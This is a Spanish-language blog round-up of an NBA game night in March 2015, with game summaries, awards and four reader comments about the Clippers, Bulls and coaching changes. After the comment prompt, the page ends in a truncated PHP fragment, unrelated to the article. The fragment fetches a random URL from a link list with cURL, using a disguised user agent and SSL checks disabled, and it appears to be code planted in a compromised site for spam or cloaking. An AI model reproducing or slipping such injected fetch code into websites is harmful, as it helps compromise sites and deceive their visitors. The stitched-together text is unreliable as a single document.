La Crónica: Fogonazo Jack

03 de March de 2015 por txusma

Los Warriors jugaron con fuego y Jack les quemó, así que tenemos a los Hawks en primera posición de los standings. En Minnesota, el triple doble de Ricky no detuvo a estos Clippers sorprendentemente competitivos sin Griffin. Y otro de los focos de la jornada estuvo en Miami, donde los Suns le dieron a su ex compañero Dragic de todo menos caricias.

Os lo contamos todo a continuación.

buzz

Golden State Warriors 108 – Brooklyn Nets 110

Venían jugando con fuego los Warriors, y anoche se quemaron con un fogonazo de Jarrett Jack a 1 segundo para el final. Igual que les ocurriera en Boston, los de Oakland salieron al Barclays Center demasiado confiados en su superioridad, descuidados en defensa, carentes de la inspiración ofensiva que les distingue, obligados a remontar tras un arranque pésimo. Y, pese a la peor actuación que le recordamos a Klay Thompson, a punto estuvieron de salir indemnes otra vez gracias al despertar de Steph Curry en el tramo final. Los Warriors llegaron a tener posesión para llevarse el triunfo pero una pérdida de balón de Bogut, que había sido de los mejores visitentes, dio paso a la acción de Jack, un especialista en estas lides. La espectacular canasta de Jack premió el meritorio encuentro de los Nets y les devuelve a puestos de Playoffs.

L.A. Clippers 110 – Minnesota Timberwolves 105

Parecía que los Wolves no le iban a durar ni un asalto a estos Clippers que, en ausencia de Blake Griffin, parecen haberse redescubierto a sí mismos. Mandaban los californianos 36-18 ya en el primer cuarto, y las ausencias de Pekovic y Kevin Martin se presentaban excesivas para los locales. Sin embargo, la entrada de LaVine y Payne revolucionó el partido y activó el juego de los Wolves, que empezaron a correr y desarbolaron a los Clippers hasta situarse por delante antes del intermedio. El encuentro se equilibró en la reanudación. La magnífica batalla entre Chris Paul y Ricky Rubio se resolvió con tablas en lo individual pero en lo colectivo se decantó del lado del primero. Los Clippers apretaron los dientes en defensa, se desenvolvieron mejor en el caótico tramo final (que incluyó cuatro técnicas) y dejaron a los Wolves sin anotar una sola canasta en juego en los últimos 10 minutos.

Resto de la jornada

Pasito atrás de Suns y Pelicans. Ambos equipos cayeron ayer y empiezan a despedirse de la postemporada. Phoenix perdió claramente ante su ex Goran Dragic en un partido durísimo con 3 expulsados. El esloveno los clavó nada menos que 21 puntos, ¡en 15 minutos! Por su parte, los Pelicans no pudieron mantener su racha victoriosa en Dallas en un buen partido del veterano Richard Jefferson. Mientras, en Philadelphia, victoria de los Raptors que rompen así su racha de 5 derrotas consecutivas. De todas maneras no parece nada bueno que para conseguir ganar a los Sixers necesitaran el mejor partido de la temporada de DeMar DeRozan. Malos tiempos para los del norte…

PREMIOS

MVP: Chris Paul acabó su partido frente los Wolves con 26 puntos, 14 asistencias, 4 rebotes y 3 robos y eso que en el último cuarto estuvo algo desacertado y sólo consiguió 4 puntos y una asistencia. Eso sí, clavó una canasta clave sobre Kevin Garnett a falta de 40 segundos para enmarcar. Por su parte, Demar DeRozan abusó de los Sixers con 35 puntos, 9 rebotes y 4 asistencias.

Rookie: Triunvirato de los rookies de Minnesota. Andrew Wiggins (18), Zach LaVine (14-3-4) y Adreain Payne (12-5) fueron decisivos en varias fases del partido.

Sorpresa: ¿Exactamente de dónde ha salido Tyler Johnson? Ya hace días que le seguimos la pista pero ayer explotó saliendo desde el banco con 26 puntos y 4 robos en 26 minutos para los Heat.

Decepción: Klay Thompson estuvo extrañamente desacertado de cara al aro. Falló 14 de los 17 tiros que intentó y los Warriors lo acabaron pagando con una derrota.

Esfuerzo en vano: 4º triple-doble de Ricky Rubio en la NBA (18-12-11), este ante Chris Paul nada menos. Desgraciadamente, al contrario que en los 3 triples-dobles anteriores, los Wolves no consiguieron ganar.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. luismi_vallecas dice:
    #1

    Vi en este foro hace un tiempo una opinión sobre los Clippers que me llamó la atención. Alguien puso que a los Clippers podría venirles bien un traspaso de Chris Paul por un base y un alero de buen nivel dado que Griffin parece que juega mejor sin él y, por lo visto, parece que el base juega mejor sin Griffin. Si es así, parece algo pronto para decirlo, no sería descabellado un traspaso gordo con los Clippers de por medio en verano.

      Citar

  2. Ruxixón dice:
    #2

    luismi_vallecas:
    Vi en este foro hace un tiempo una opinión sobre los Clippers que me llamó la atención. Alguien puso que a los Clippers podría venirles bien un traspaso de Chris Paul por un base y un alero de buen nivel dado que Griffin parece que juega mejor sin él y, por lo visto, parece que el base juega mejor sin Griffin. Si es así, parece algo pronto para decirlo, no sería descabellado un traspaso gordo con los Clippers de por medio en verano.

    No sé si habrá alguien más por ahí de la opinión,pero yo soy uno de los locos que piensa así,principalmente porque Paul no muestra este nivel con Blake Griffin al lado.Conste que con la ausencia de BG probablemente el mejor base para sacar todo el rendimiento de DeAndre sea CP3,amén de sus propias actuaciones durante esta ausencia de Griffin.Puede que por razones de ecosistema Paul de ese paso atrás con todos disponibles,pero tampoco es que los Clippers tengan un roster tan profundo.Juntando la corta rotación de gente de nivel y con las estrecheces económicas del salary cap (dependiendo de los aumentos a corto/medio plazo esto cambia) a mí me sale como beneficioso un traspaso de Paul por 2-3 jugadores.

    Por ejemplo,a mí me salía como muy beneficioso un traspaso con Utah,equipo al que le falta ese punto de veteranía para dar otro paso más.Algo como Burke,Kanter y su ronda de este próximo draft.

      Citar

  3. Triceratops dice:
    #3

    Brian Shaw….You’re fired….

    Y hablando de entrenadores, Borrego se confirma como tecnico de los Magic hasta final de temporada, es decir, 3 años sin un coach de verdad desde que se fue Van Gundy,

      Citar

  4. Nacho dice:
    #4

    Yo estoy flipando con estos Clippers. Les daba PO con tembleque cuando se lesionó Griffin, y me están dando un ZAS en toda la boca. Paul sigue cayéndome mal,pero está soberbio, y hace años que no se veía un dominio en la pintura como el de DeAndré. Flipé más aún cuando viendo el partido contra los Bulls dijeron que llevaba 300 partidos seguidos sin perderse uno. Por lo demás, rotación muy corta, parece que Reddick está más regular y Rivers una de cal y tres de arena. Les falta para las eliminatorias, pero ojo.

    Por otro lado, Butler también KO, y volverá para PO, junto con, esperemos, Rose. Puede hasta ser bueno para los Bulls. No creo que pierdan la ventaja de campo. Si algo hace bueno Thibodeau es sacar agua del desierto. Y pueden ser minutos importantes para la confirmación de Snell (muy bien los últimos partidos) el regreso del rookie wall de Mirotic y dar cancha (por qué no?) a McDermott. Y que no exprima demasiado a Gasol, a ver si le pasa lo mismo que a sus compañeros. Lo que no sé es para cuanto tiene Gibson.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>